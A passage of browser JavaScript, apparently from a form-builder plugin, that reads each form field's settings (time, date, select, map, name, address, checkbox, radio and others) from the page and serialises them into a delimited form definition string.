					w_ss=document.getElementById(id+'_ssform_id_temp').value;
					w_sec="1";
					w_mini_label_ss=document.getElementById(id+'_mini_label_ss').innerHTML;
				}
				else
				{
					w_ss="";
					w_sec="0";
					w_mini_label_ss='';
				}
				if(document.getElementById(id+'_am_pm_select'))
				{
					w_am_pm=document.getElementById(id+'_am_pmform_id_temp').value;
					w_time_type="12";
					w_mini_labels = [document.getElementById(id+'_mini_label_hh').innerHTML, document.getElementById(id+'_mini_label_mm').innerHTML, w_mini_label_ss, document.getElementById(id+'_mini_label_am_pm').innerHTML];
		
				}
				else
				{
					w_am_pm=0;
					w_time_type="24";
					w_mini_labels = [document.getElementById(id+'_mini_label_hh').innerHTML, document.getElementById(id+'_mini_label_mm').innerHTML, w_mini_label_ss ,'AM/PM'];
			
				}
				type_time(gen, w_field_label, w_field_label_size, w_field_label_pos, w_time_type, w_am_pm, w_sec, w_hh, w_mm, w_ss, w_mini_labels, w_required, w_class, w_attr_name, w_attr_value); break;
			}
			case 'type_date':
			{	
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				w_date=document.getElementById(id+'_elementform_id_temp').value;
				w_format=document.getElementById(id+'_buttonform_id_temp').getAttribute("format");
				w_but_val=document.getElementById(id+'_buttonform_id_temp').value;
				w_disable_past_days = document.getElementById(id+'_dis_past_daysform_id_temp') ? document.getElementById(id+'_dis_past_daysform_id_temp').value : 'no';
				type_date(gen, w_field_label, w_field_label_size, w_field_label_pos, w_date, w_required, w_class, w_format, w_but_val, w_attr_name, w_attr_value, w_disable_past_days); break;
			}
			case 'type_date_fields':
			{	
				atrs			=return_attributes(id+'_dayform_id_temp');
				w_attr_name		=atrs[0];
				w_attr_value	=atrs[1];
				w_day			=document.getElementById(id+'_dayform_id_temp').value;
				w_month			=document.getElementById(id+'_monthform_id_temp').value;
				w_year			=document.getElementById(id+'_yearform_id_temp').value;
				w_day_type		=document.getElementById(id+'_dayform_id_temp').tagName;
				w_month_type	=document.getElementById(id+'_monthform_id_temp').tagName;
				w_year_type		=document.getElementById(id+'_yearform_id_temp').tagName;
				w_day_label		=document.getElementById(id+'_day_label').innerHTML;
				w_month_label	=document.getElementById(id+'_month_label').innerHTML;
				w_year_label	=document.getElementById(id+'_year_label').innerHTML;
				
				s				=document.getElementById(id+'_dayform_id_temp').style.width;
				w_day_size		=s.substring(0,s.length-2);
				
				s				=document.getElementById(id+'_monthform_id_temp').style.width;
				w_month_size	=s.substring(0,s.length-2);
				
				s				=document.getElementById(id+'_yearform_id_temp').style.width;
				w_year_size		=s.substring(0,s.length-2);
	
				w_from			=document.getElementById(id+'_yearform_id_temp').getAttribute('from');
				w_to			=document.getElementById(id+'_yearform_id_temp').getAttribute('to');
				
				w_divider		=document.getElementById(id+'_separator1').innerHTML;
				type_date_fields(gen, w_field_label, w_field_label_size, w_field_label_pos, w_day, w_month, w_year, w_day_type, w_month_type, w_year_type, w_day_label, w_month_label, w_year_label, w_day_size, w_month_size, w_year_size, w_required, w_class, w_from, w_to, w_divider, w_attr_name, w_attr_value); break;
			}
			
			case 'type_own_select':
			{	
				jQuery('#'+id+'_elementform_id_temp option').each(function() {
					w_choices[t]=jQuery(this).html();
					w_choices_value[t]=jQuery(this).val();
					w_choices_checked[t]=jQuery(this)[0].selected;
					if(jQuery(this).attr('where'))
						w_choices_params[t]=jQuery(this).attr('where')+'[where_order_by]'+jQuery(this).attr('order_by')+'[db_info]'+jQuery(this).attr('db_info');
					else
						w_choices_params[t]='';
						
					if(jQuery(this).val())
						w_choices_disabled[t]=false;	
					else
						w_choices_disabled[t]=true;
					t++;		
				});

				w_value_disabled = document.getElementById(id+'_value_disabledform_id_temp').value;
				
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_own_select(gen, w_field_label, w_field_label_size, w_field_label_pos, w_size, w_choices, w_choices_checked, w_required, w_value_disabled, w_class, w_attr_name, w_attr_value, w_choices_disabled, w_choices_value, w_choices_params); break;
			}
			
			
			case 'type_country':
			{	
				w_countries=[];

				select_=document.getElementById(id+'_elementform_id_temp');
				n=select_.childNodes.length;
				for(i=0; i<n; i++)
				{
					w_countries.push(select_.childNodes[i].value);
				}

				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_country(gen, w_field_label, w_field_label_size, w_countries, w_field_label_pos, w_size, w_required, w_class,  w_attr_name, w_attr_value);  break;
			}
			case 'type_map':
			{
				w_lat=[];
				w_long=[];
				w_info=[];
				
				w_center_x  = document.getElementById(id+"_elementform_id_temp").getAttribute("center_x");
				w_center_y  = document.getElementById(id+"_elementform_id_temp").getAttribute("center_y");
				w_zoom  = document.getElementById(id+"_elementform_id_temp").getAttribute("zoom");
				w_width = parseInt(document.getElementById(id+"_elementform_id_temp").style.width);
				w_height= parseInt(document.getElementById(id+"_elementform_id_temp").style.height);
				
				
				
				for(j=0; j<=20; j++)
					if( document.getElementById(id+"_elementform_id_temp").getAttribute("lat"+j))
					{
						w_lat.push(document.getElementById(id+"_elementform_id_temp").getAttribute("lat"+j));
						w_long.push(document.getElementById(id+"_elementform_id_temp").getAttribute("long"+j));
						w_info.push(document.getElementById(id+"_elementform_id_temp").getAttribute("info"+j));
					}

				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_map(gen, w_center_x, w_center_y, w_long, w_lat, w_zoom, w_width, w_height, w_class, w_info, w_attr_name, w_attr_value); break;
			}
			
			case 'type_mark_map':
			{
				w_info  = document.getElementById(id+"_elementform_id_temp").getAttribute("info0");
				w_long  = document.getElementById(id+"_elementform_id_temp").getAttribute("long0");
				w_lat   = document.getElementById(id+"_elementform_id_temp").getAttribute("lat0");
				w_zoom  = document.getElementById(id+"_elementform_id_temp").getAttribute("zoom");
				w_width = parseInt(document.getElementById(id+"_elementform_id_temp").style.width);
				w_height= parseInt(document.getElementById(id+"_elementform_id_temp").style.height);
				w_center_x  = document.getElementById(id+"_elementform_id_temp").getAttribute("center_x");
				w_center_y  = document.getElementById(id+"_elementform_id_temp").getAttribute("center_y");
				
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_mark_map(gen, w_field_label, w_field_label_size, w_field_label_pos, w_center_x, w_center_y, w_long, w_lat, w_zoom, w_width, w_height, w_class, w_info, w_attr_name, w_attr_value);break;
			}
			case 'type_submit_reset':
			{
				atrs=return_attributes(id+'_element_submitform_id_temp');
				w_act=!(document.getElementById(id+"_element_resetform_id_temp").style.display=="none");
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				w_submit_title = document.getElementById(id+"_element_submitform_id_temp").value;
				w_reset_title  = document.getElementById(id+"_element_resetform_id_temp").value;
				type_submit_reset(gen, w_submit_title , w_reset_title , w_class, w_act, w_attr_name, w_attr_value);  break;
			}

			case 'type_button':
			{
				w_title	=new Array();	
			
				w_func	=new Array();
				t=0;
				v=0;
				for(k=0;k<100;k++)
					if(document.getElementById(id+"_elementform_id_temp"+k))
					{
						w_title[t]=document.getElementById(id+"_elementform_id_temp"+k).value;
						w_func[t]=document.getElementById(id+"_elementform_id_temp"+k).getAttribute("onclick");
						t++;
						v=k;
					}
				atrs=return_attributes(id+'_elementform_id_temp'+v);
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_button (gen, w_title , w_func , w_class,w_attr_name, w_attr_value);  break;
			}
			case 'type_hidden':
			{
				w_value  = document.getElementById(id+"_elementform_id_temp").value;
				w_name  = document.getElementById(id+"_elementform_id_temp").name;
				
				atrs=return_attributes(id+'_elementform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
				type_hidden (gen, w_name, w_value , w_attr_name, w_attr_value);  break;
			}

		}
	
	need_enable=false;
		add(0, false);
		need_enable=true;	
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
}



function gen_form_fields()
{
	switch(wdtype)
	{
		case 'type_editor':
		{
			w_editor=document.getElementById("wdform_field"+id).innerHTML;
									
			form_fields+=w_field_label+"*:*w_field_label*:*";
			form_fields+=w_editor+"*:*w_editor*:*";
			form_fields+="*:*new_field*:*";
		
			break;
		}
		case 'type_send_copy':
		{
			w_first_val=document.getElementById(id+"_elementform_id_temp").checked;
			atrs=return_attributes(id+'_elementform_id_temp');
			w_attr_name=atrs[0];
			w_attr_value=atrs[1];

			form_fields+=w_field_label+"*:*w_field_label*:*";
			form_fields+=w_field_label_size+"*:*w_field_label_size*:*";
			form_fields+=w_field_label_pos+"*:*w_field_label_pos*:*";
			form_fields+=w_first_val+"*:*w_first_val*:*";
			form_fields+=w_required+"*:*w_required*:*";
									
			for(j=0; j<w_attr_name.length; j++)
			{
				form_fields+=w_attr_name[j]+"="+w_attr_value[j]+"*:*w_attr_name*:*";
			}
			form_fields+="*:*new_field*:*";
			break;
			}
		
		case 'type_text':
		{
			w_first_val=document.getElementById(id+"_elementform_id_temp").value;
			w_title=document.getElementById(id+"_elementform_id_temp").title;
			w_regExp_status = document.getElementById(id+"_regExpStatusform_id_temp").value;
			w_regExp_value = document.getElementById(id+"_regExp_valueform_id_temp").value;
			w_regExp_common = document.getElementById(id+"_regExp_commonform_id_temp").value;
			w_regExp_arg = document.getElementById(id+"_regArgumentform_id_temp").value;
			w_regExp_alert = document.getElementById(id+"_regExp_alertform_id_temp").value;
			atrs=return_attributes(id+'_elementform_id_temp');
			w_attr_name=atrs[0];
			w_attr_value=atrs[1];
									
			form_fields+=w_field_label+"*:*w_field_label*:*";
			form_fields+=w_field_label_size+"*:*w_field_label_size*:*";
			form_fields+=w_field_label_pos+"*:*w_field_label_pos*:*";
			form_fields+=w_size+"*:*w_size*:*";
			form_fields+=w_first_val+"*:*w_first_val*:*";
			form_fields+=w_title+"*:*w_title*:*";
			form_fields+=w_required+"*:*w_required*:*";
			form_fields+=w_regExp_status+"*:*w_regExp_status*:*";
			form_fields+=w_regExp_value+"*:*w_regExp_value*:*";
			form_fields+=w_regExp_common+"*:*w_regExp_common*:*";
			form_fields+=w_regExp_arg+"*:*w_regExp_arg*:*";
			form_fields+=w_regExp_alert+"*:*w_regExp_alert*:*";
			form_fields+=w_unique+"*:*w_unique*:*";
									
			for(j=0; j<w_attr_name.length; j++)
			{
				form_fields+=w_attr_name[j]+"="+w_attr_value[j]+"*:*w_attr_name*:*";
			}
			form_fields+="*:*new_field*:*";
			break;
		}
		case 'type_number':
		{
			w_first_val=document.getElementById(id+"_elementform_id_temp").value;
			w_title=document.getElementById(id+"_elementform_id_temp").title;
			atrs=return_attributes(id+'_elementform_id_temp');
			w_attr_name=atrs[0];
			w_attr_value=atrs[1];
			
			form_fields+=w_field_label+"*:*w_field_label*:*";
			form_fields+=w_field_label_size+"*:*w_field_label_size*:*";
			form_fields+=w_field_label_pos+"*:*w_field_label_pos*:*";
			form_fields+=w_size+"*:*w_size*:*";
			form_fields+=w_first_val+"*:*w_first_val*:*";
			form_fields+=w_title+"*:*w_title*:*";
			form_fields+=w_required+"*:*w_required*:*";
			form_fields+=w_unique+"*:*w_unique*:*";
			form_fields+=w_class+"*:*w_class*:*";
			
			for(j=0; j<w_attr_name.length; j++)
			{
				form_fields+=w_attr_name[j]+"="+w_attr_value[j]+"*:*w_attr_name*:*";
			}
			form_fields+="*:*new_field*:*";	
			break;
			
		}
		case 'type_password':
		{
			atrs=return_attributes(id+'_elementform_id_temp');
			w_attr_name=atrs[0];
			w_attr_value=atrs[1];
			
		
			form_fields+=w_field_label+"*:*w_field_label*:*";
			form_fields+=w_field_label_size+"*:*w_field_label_size*:*";
			form_fields+=w_field_label_pos+"*:*w_field_label_pos*:*";
			form_fields+=w_size+"*:*w_size*:*";
			form_fields+=w_required+"*:*w_required*:*";
			form_fields+=w_unique+"*:*w_unique*:*";
			form_fields+=w_class+"*:*w_class*:*";
			
			for(j=0; j<w_attr_name.length; j++)
			{
				form_fields+=w_attr_name[j]+"="+w_attr_value[j]+"*:*w_attr_name*:*";
			}
			form_fields+="*:*new_field*:*";	
			break;
				
		}
		case 'type_textarea':
		{
			w_first_val=document.getElementById(id+"_elementform_id_temp").value;
			w_title=document.getElementById(id+"_elementform_id_temp").title;
			s=document.getElementById(id+"_elementform_id_temp").style.height;
			w_size_h=s.substring(0,s.length-2);
			w=document.getElementById(id+"_elementform_id_temp").style.width;
			w_size_w=w.substring(0,w.length-2);

			atrs=return_attributes(id+'_elementform_id_temp');
			w_attr_name=atrs[0];
			w_attr_value=atrs[1];
		
			form_fields+=w_field_label+"*:*w_field_label*:*";
			form_fields+=w_field_label_size+"*:*w_field_label_size*:*";
			form_fields+=w_field_label_pos+"*:*w_field_label_pos*:*";
			form_fields+=w_size+"*:*w_size_w*:*";
			form_fields+=w_size_h+"*:*w_size_h*:*";
			form_fields+=w_first_val+"*:*w_first_val*:*";
			form_fields+=w_title+"*:*w_title*:*";
			form_fields+=w_required+"*:*w_required*:*";
			form_fields+=w_unique+"*:*w_unique*:*";
			form_fields+=w_class+"*:*w_class*:*";
			
			for(j=0; j<w_attr_name.length; j++)
			{
				form_fields+=w_attr_name[j]+"="+w_attr_value[j]+"*:*w_attr_name*:*";
			}
			form_fields+="*:*new_field*:*";	
			break;
			}
			
		case 'type_wdeditor':
		{
		
			w_title=document.getElementById(id+"_elementform_id_temp").title;
			s=document.getElementById(id+"_elementform_id_temp").style.height;
			w_size_h=s.substring(0,s.length-2);
			w=document.getElementById(id+"_elementform_id_temp").style.width;
			w_size_w=w.substring(0,w.length-2);

			atrs=return_attributes(id+'_elementform_id_temp');
			w_attr_name=atrs[0];
			w_attr_value=atrs[1];
		
			form_fields+=w_field_label+"*:*w_field_label*:*";
			form_fields+=w_field_label_size+"*:*w_field_label_size*:*";
			form_fields+=w_field_label_pos+"*:*w_field_label_pos*:*";
			form_fields+=w_size+"*:*w_size_w*:*";
			form_fields+=w_size_h+"*:*w_size_h*:*";
			form_fields+=w_title+"*:*w_title*:*";
			form_fields+=w_required+"*:*w_required*:*";
			form_fields+=w_class+"*:*w_class*:*";
			
			for(j=0; j<w_attr_name.length; j++)
			{
				form_fields+=w_attr_name[j]+"="+w_attr_value[j]+"*:*w_attr_name*:*";
			}
			form_fields+="*:*new_field*:*";	
			break;
		}
		
				
			
		case 'type_phone':
		{
			w_first_val=[document.getElementById(id+"_element_firstform_id_temp").value, document.getElementById(id+"_element_lastform_id_temp").value];
			w_title=[document.getElementById(id+"_element_firstform_id_temp").title, document.getElementById(id+"_element_lastform_id_temp").title];
			s=document.getElementById(id+"_element_lastform_id_temp").style.width;
			w_size=s.substring(0,s.length-2);

			w_mini_labels= [document.getElementById(id+"_mini_label_area_code").innerHTML, document.getElementById(id+"_mini_label_phone_number").innerHTML];
			
			
			atrs=return_attributes(id+'_element_firstform_id_temp');
			w_attr_name=atrs[0];
			w_attr_value=atrs[1];
			
				form_fields+=w_field_label+"*:*w_field_label*:*";
				form_fields+=w_field_label_size+"*:*w_field_label_size*:*";
				form_fields+=w_field_label_pos+"*:*w_field_label_pos*:*";
				form_fields+=w_size+"*:*w_size*:*";
				form_fields+=w_first_val.join('***')+"*:*w_first_val*:*";
				form_fields+=w_title.join('***')+"*:*w_title*:*";
				form_fields+=w_mini_labels.join('***')+"*:*w_mini_labels*:*";
				form_fields+=w_required+"*:*w_required*:*";
				form_fields+=w_unique+"*:*w_unique*:*";
				form_fields+=w_class+"*:*w_class*:*";
				
				for(j=0; j<w_attr_name.length; j++)
				{
				form_fields+=w_attr_name[j]+"="+w_attr_value[j]+"*:*w_attr_name*:*";
				}
				form_fields+="*:*new_field*:*";	
				break;
				}
		case 'type_name':
		{
			if(document.getElementById(id+"_enable_fieldsform_id_temp")) {
					w_name_format="normal";
				
					w_first_val=[document.getElementById(id+"_element_firstform_id_temp").value, document.getElementById(id+"_element_lastform_id_temp").value];
					w_title=[document.getElementById(id+"_element_firstform_id_temp").title, document.getElementById(id+"_element_lastform_id_temp").title];
					
					var title_middle = ['title', 'middle'];
					for(var l=0; l<2; l++)
					{
						w_first_val.push(document.getElementById(id+'_element_'+title_middle[l]+'form_id_temp') ? document.getElementById(id+'_element_'+title_middle[l]+'form_id_temp').value : '');
						w_title.push(document.getElementById(id+'_element_'+title_middle[l]+'form_id_temp') ? document.getElementById(id+'_element_'+title_middle[l]+'form_id_temp').title : '');
					}
					
				}
				else
				{
					if(document.getElementById(id+'_element_middleform_id_temp'))
						w_name_format="extended";
					else
						w_name_format="normal";

					if(w_name_format=="normal")	{
						w_first_val=[document.getElementById(id+"_element_firstform_id_temp").value, document.getElementById(id+"_element_lastform_id_temp").value];
						w_title=[document.getElementById(id+"_element_firstform_id_temp").title, document.getElementById(id+"_element_lastform_id_temp").title];
					}
					else {
						w_first_val=[document.getElementById(id+"_element_firstform_id_temp").value, document.getElementById(id+"_element_lastform_id_temp").value, document.getElementById(id+"_element_titleform_id_temp").value, document.getElementById(id+"_element_middleform_id_temp").value];
						w_title=[document.getElementById(id+"_element_firstform_id_temp").title, document.getElementById(id+"_element_lastform_id_temp").title, document.getElementById(id+"_element_titleform_id_temp").title,document.getElementById(id+"_element_middleform_id_temp").title];
					}
				}
	
				if(document.getElementById(id+"_mini_label_title"))
					w_mini_title = document.getElementById(id+"_mini_label_title").innerHTML;
				else
					w_mini_title = "Title";
			
				if(document.getElementById(id+"_mini_label_middle"))
					w_mini_middle = document.getElementById(id+"_mini_label_middle").innerHTML;
				else
					w_mini_middle = "Middle";
				
				w_mini_labels = [w_mini_title, document.getElementById(id+"_mini_label_first").innerHTML,document.getElementById(id+"_mini_label_last").innerHTML, w_mini_middle];
				w_name_title = 	document.getElementById(id+'_enable_fieldsform_id_temp') ? document.getElementById(id+'_enable_fieldsform_id_temp').getAttribute('title') : (w_name_format=="normal" ? 'no' : 'yes');			
				w_name_middle = document.getElementById(id+'_enable_fieldsform_id_temp') ? document.getElementById(id+'_enable_fieldsform_id_temp').getAttribute('middle') : (w_name_format=="normal" ? 'no' : 'yes');			
				w_name_fields = [w_name_title, w_name_middle]; 	    
				 
				s=document.getElementById(id+"_element_firstform_id_temp").style.width;
				w_size=s.substring(0,s.length-2);
				atrs=return_attributes(id+'_element_firstform_id_temp');
				w_attr_name=atrs[0];
				w_attr_value=atrs[1];
	
				form_fields+=w_field_label+"*:*w_field_label*:*";
				form_fields+=w_field_label_size+"*:*w_field_label_size*:*";
				form_fields+=w_field_label_pos+"*:*w_field_label_pos*:*";
				form_fields+=w_first_val.join('***')+"*:*w_first_val*:*";
				form_fields+=w_title.join('***')+"*:*w_title*:*";
				form_fields+=w_mini_labels.join('***')+"*:*w_mini_labels*:*";
				form_fields+=w_size+"*:*w_size*:*";
				form_fields+=w_name_format+"*:*w_name_format*:*";
				form_fields+=w_required+"*:*w_required*:*";
				form_fields+=w_unique+"*:*w_unique*:*";
				form_fields+=w_class+"*:*w_class*:*";
				
				for(j=0; j<w_attr_name.length; j++)
				{
				form_fields+=w_attr_name[j]+"="+w_attr_value[j]+"*:*w_attr_name*:*";
				}
				form_fields+=w_name_fields.join('***')+"*:*w_name_fields*:*";
				
				form_fields+="*:*new_field*:*";	
				break;
			}

		case 'type_address':
		{
			s=document.getElementById(id+"_div_address").style.width;
			w_size=s.substring(0,s.length-2);
			
			if(document.getElementById(id+"_mini_label_street1"))
					w_street1= document.getElementById(id+"_mini_label_street1").innerHTML; 
				else
					w_street1 = document.getElementById(id+"_street1form_id_temp").value;
					
					
				if(document.getElementById(id+"_mini_label_street2"))
					w_street2= document.getElementById(id+"_mini_label_street2").innerHTML;
				else
					w_street2 = document.getElementById(id+"_street2form_id_temp").value;	
					
				if(document.getElementById(id+"_mini_label_city"))
					w_city= document.getElementById(id+"_mini_label_city").innerHTML;
				else
					w_city = document.getElementById(id+"_cityform_id_temp").value;					
					
				if(document.getElementById(id+"_mini_label_state"))
					w_state= document.getElementById(id+"_mini_label_state").innerHTML; 
				else
					w_state = document.getElementById(id+"_stateform_id_temp").value;	
					
				if(document.getElementById(id+"_mini_label_postal"))
					w_postal= document.getElementById(id+"_mini_label_postal").innerHTML; 
				else
					w_postal = document.getElementById(id+"_postalform_id_temp").value;	
					
				if(document.getElementById(id+"_mini_label_country"))
					w_country= document.getElementById(id+"_mini_label_country").innerHTML; 
				else
					w_country = document.getElementById(id+"_countryform_id_temp").value;					
					
				w_mini_labels=[w_street1, w_street2, w_city, w_state, w_postal, w_country];

				
				var disabled_input = document.getElementById(id+"_disable_fieldsform_id_temp");
				
					w_street1_dis= disabled_input.getAttribute('street1');
					w_street2_dis= disabled_input.getAttribute('street2');
					w_city_dis= disabled_input.getAttribute('city');
					w_state_dis= disabled_input.getAttribute('state');
					w_us_states_dis= disabled_input.getAttribute('us_states');
					w_postal_dis= disabled_input.getAttribute('postal');
					w_country_dis= disabled_input.getAttribute('country');
				
						
			w_disabled_fields=[w_street1_dis, w_street2_dis, w_city_dis, w_state_dis,  w_postal_dis, w_country_dis, w_us_states_dis];

			atrs=return_attributes(id+'_street1form_id_temp');
			w_attr_name=atrs[0];
			w_attr_value=atrs[1];
			
			
				form_fields+=w_field_label+"*:*w_field_label*:*";
				form_fields+=w_field_label_size+"*:*w_field_label_size*:*";
				form_fields+=w_field_label_pos+"*:*w_field_label_pos*:*";
				form_fields+=w_size+"*:*w_size*:*";
				form_fields+=w_mini_labels.join('***')+"*:*w_mini_labels*:*";
				form_fields+=w_disabled_fields.join('***')+"*:*w_disabled_fields*:*";
				form_fields+=w_required+"*:*w_required*:*";
				form_fields+=w_class+"*:*w_class*:*";
				
				for(j=0; j<w_attr_name.length; j++)
				{
				form_fields+=w_attr_name[j]+"="+w_attr_value[j]+"*:*w_attr_name*:*";
				}
				
				form_fields+="*:*new_field*:*";	
				break;
			}

		case 'type_submitter_mail':
		{
			w_first_val=document.getElementById(id+"_elementform_id_temp").value;
			w_title=document.getElementById(id+"_elementform_id_temp").title;
	
			atrs=return_attributes(id+'_elementform_id_temp');
			w_attr_name=atrs[0];
			w_attr_value=atrs[1];
			
				form_fields+=w_field_label+"*:*w_field_label*:*";
				form_fields+=w_field_label_size+"*:*w_field_label_size*:*";
				form_fields+=w_field_label_pos+"*:*w_field_label_pos*:*";
				form_fields+=w_size+"*:*w_size*:*";
				form_fields+=w_first_val+"*:*w_first_val*:*";
				form_fields+=w_title+"*:*w_title*:*";
				form_fields+=w_required+"*:*w_required*:*";
				form_fields+=w_unique+"*:*w_unique*:*";
				form_fields+=w_class+"*:*w_class*:*";
				
				for(j=0; j<w_attr_name.length; j++)
				{
				form_fields+=w_attr_name[j]+"="+w_attr_value[j]+"*:*w_attr_name*:*";
				}
				
				form_fields+="*:*new_field*:*";	
				break;
			}
		case 'type_checkbox':
		{	
			w_randomize=document.getElementById(id+"_randomizeform_id_temp").value;
			w_allow_other=document.getElementById(id+"_allow_otherform_id_temp").value;
			tt=0;
			v=0;
		
			w_randomize=document.getElementById(id+"_randomizeform_id_temp").value;
			w_allow_other=document.getElementById(id+"_allow_otherform_id_temp").value;

			if(document.getElementById(id+"_rowcol_numform_id_temp").value)	
			{
				
                if(document.getElementById(id+'_table_little').getAttribute('for_hor'))
					w_flow="hor"	
				else
					w_flow="ver";				
				w_rowcol = 	document.getElementById(id+"_rowcol_numform_id_temp").value;
			}
			else
			{
				if(document.getElementById(id+'_hor'))
					w_flow="hor"	
				else
					w_flow="ver";
				
				w_rowcol = 1;
			}
				
			if(w_flow=="ver")
			{
				var table_little = document.getElementById(id+'_table_little');
				for(k=0;k < table_little.childNodes.length; k++)
				{
					var td_little = table_little.childNodes[k];
						for(m=0; m < td_little.childNodes.length; m++)
						{
							var idi = td_little.childNodes[m].getAttribute('idi');
							if(document.getElementById(id+"_elementform_id_temp"+idi).getAttribute('other'))
								if(document.getElementById(id+"_elementform_id_temp"+idi).getAttribute('other')=='1')
									w_allow_other_num=tt;
							w_choices[tt]=document.getElementById(id+"_label_element"+idi).innerHTML;
							w_choices_checked[tt]=document.getElementById(id+"_elementform_id_temp"+idi).checked;
							w_choices_value[tt]=document.getElementById(id+"_elementform_id_temp"+idi).value;
							if(document.getElementById(id+"_label_element"+idi).getAttribute('where'))
								w_choices_params[tt]=document.getElementById(id+"_label_element"+idi).getAttribute('where')+'[where_order_by]'+document.getElementById(id+"_label_element"+idi).getAttribute('order_by')+'[db_info]'+document.getElementById(id+"_label_element"+idi).getAttribute('db_info');
							else
								w_choices_params[tt]='';
							tt++;
							v=idi;
						}
				}
			
			}
			else
			{
				var table_little = document.getElementById(id+'_table_little');
				var	tr_little = table_little.childNodes;
				var td_max = tr_little[0].childNodes;
				
				for(k=0;k < td_max.length; k++)
				{
					for(m=0; m < tr_little.length; m++)
					{
						if(tr_little[m].childNodes[k])
						{
							var td_little = tr_little[m].childNodes[k];
							var idi = td_little.getAttribute('idi');
							if(document.getElementById(id+"_elementform_id_temp"+idi).getAttribute('other'))
								if(document.getElementById(id+"_elementform_id_temp"+idi).getAttribute('other')=='1')
									w_allow_other_num=tt;
							w_choices[tt]=document.getElementById(id+"_label_element"+idi).innerHTML;
							w_choices_checked[tt]=document.getElementById(id+"_elementform_id_temp"+idi).checked;
							w_choices_value[tt]=document.getElementById(id+"_elementform_id_temp"+idi).value;
							if(document.getElementById(id+"_label_element"+idi).getAttribute('where'))
								w_choices_params[tt]=document.getElementById(id+"_label_element"+idi).getAttribute('where')+'[where_order_by]'+document.getElementById(id+"_label_element"+idi).getAttribute('order_by')+'[db_info]'+document.getElementById(id+"_label_element"+idi).getAttribute('db_info');
							else
								w_choices_params[tt]='';
							tt++;
							v=idi;
						}
					}
				}
			
			}
			
			if(document.getElementById(id+"_option_left_right"))
				w_field_option_pos = document.getElementById(id+"_option_left_right").value;
			else
				w_field_option_pos = 'left';
				
			w_value_disabled = document.getElementById(id+"_value_disabledform_id_temp").value;

			atrs=return_attributes(id+'_elementform_id_temp'+v);
			w_attr_name=atrs[0];
			w_attr_value=atrs[1];
			
			form_fields+=w_field_label+"*:*w_field_label*:*";
			form_fields+=w_field_label_size+"*:*w_field_label_size*:*";
			form_fields+=w_field_label_pos+"*:*w_field_label_pos*:*";
			form_fields+=w_field_option_pos+"*:*w_field_option_pos*:*";
			form_fields+=w_flow+"*:*w_flow*:*";
			form_fields+=w_choices.join('***')+"*:*w_choices*:*";
			form_fields+=w_choices_checked.join('***')+"*:*w_choices_checked*:*";
			form_fields+=w_rowcol+"*:*w_rowcol*:*";
			form_fields+=w_required+"*:*w_required*:*";
			form_fields+=w_randomize+"*:*w_randomize*:*";
			form_fields+=w_allow_other+"*:*w_allow_other*:*";
			form_fields+=w_allow_other_num+"*:*w_allow_other_num*:*";
			form_fields+=w_value_disabled+"*:*w_value_disabled*:*";
			form_fields+=w_choices_value.join('***')+"*:*w_choices_value*:*";
			form_fields+=w_choices_params.join('***')+"*:*w_choices_params*:*";
			form_fields+=w_class+"*:*w_class*:*";
			
			for(j=0; j<w_attr_name.length; j++)
			{
			form_fields+=w_attr_name[j]+"="+w_attr_value[j]+"*:*w_attr_name*:*";
			}
			
			form_fields+="*:*new_field*:*";	
			break;
		}
		
		
		case 'type_radio':
		{	
			w_randomize=document.getElementById(id+"_randomizeform_id_temp").value;
			w_allow_other=document.getElementById(id+"_allow_otherform_id_temp").value;

			if(document.getElementById(id+"_rowcol_numform_id_temp").value)	
			{
				if(document.getElementById(id+'_table_little').getAttribute('for_hor'))
					w_flow="hor"	
				else
					w_flow="ver";				
				w_rowcol = 	document.getElementById(id+"_rowcol_numform_id_temp").value;
			}
			else
			{
				if(document.getElementById(id+'_table_little').getAttribute('for_hor'))
					w_flow="hor"	
				else
					w_flow="ver";
				
				w_rowcol = 1;
			}
				
			v=0;
			tt=0;
			if(w_flow=="ver")
			{	
				var table_little = document.getElementById(id+'_table_little');
				for(k=0;k < table_little.childNodes.length; k++)
				{
					var td_little = table_little.childNodes[k];
						for(m=0; m < td_little.childNodes.length; m++)
						{
							var idi = td_little.childNodes[m].getAttribute('idi');
							if(document.getElementById(id+"_elementform_id_temp"+idi).getAttribute('other'))
								if(document.getElementById(id+"_elementform_id_temp"+idi).getAttribute('other')=='1')
									w_allow_other_num=tt;
							w_choices[tt]=document.getElementById(id+"_label_element"+idi).innerHTML;
							w_choices_checked[tt]=document.getElementById(id+"_elementform_id_temp"+idi).checked;
							w_choices_value[tt]=document.getElementById(id+"_elementform_id_temp"+idi).value;
							if(document.getElementById(id+"_label_element"+idi).getAttribute('where'))
								w_choices_params[tt]=document.getElementById(id+"_label_element"+idi).getAttribute('where')+'[where_order_by]'+document.getElementById(id+"_label_element"+idi).getAttribute('order_by')+'[db_info]'+document.getElementById(id+"_label_element"+idi).getAttribute('db_info');
							else
								w_choices_params[tt]='';
							tt++;
							v=idi;
						}
				}
			}
			else
			{
				var table_little = document.getElementById(id+'_table_little');
				var	tr_little = table_little.childNodes;
				var td_max = tr_little[0].childNodes;
				
				for(k=0;k < td_max.length; k++)
				{
					for(m=0; m < tr_little.length; m++)
					{
						if(tr_little[m].childNodes[k])
						{
							var td_little = tr_little[m].childNodes[k];
							var idi = td_little.getAttribute('idi');
							if(document.getElementById(id+"_elementform_id_temp"+idi).getAttribute('other'))
								if(document.getElementById(id+"_elementform_id_temp"+idi).getAttribute('other')=='1')
									w_allow_other_num=tt;
							w_choices[tt]=document.getElementById(id+"_label_element"+idi).innerHTML;
							w_choices_checked[tt]=document.getElementById(id+"_elementform_id_temp"+idi).checked;
							w_choices_value[tt]=document.getElementById(id+"_elementform_id_temp"+idi).value;
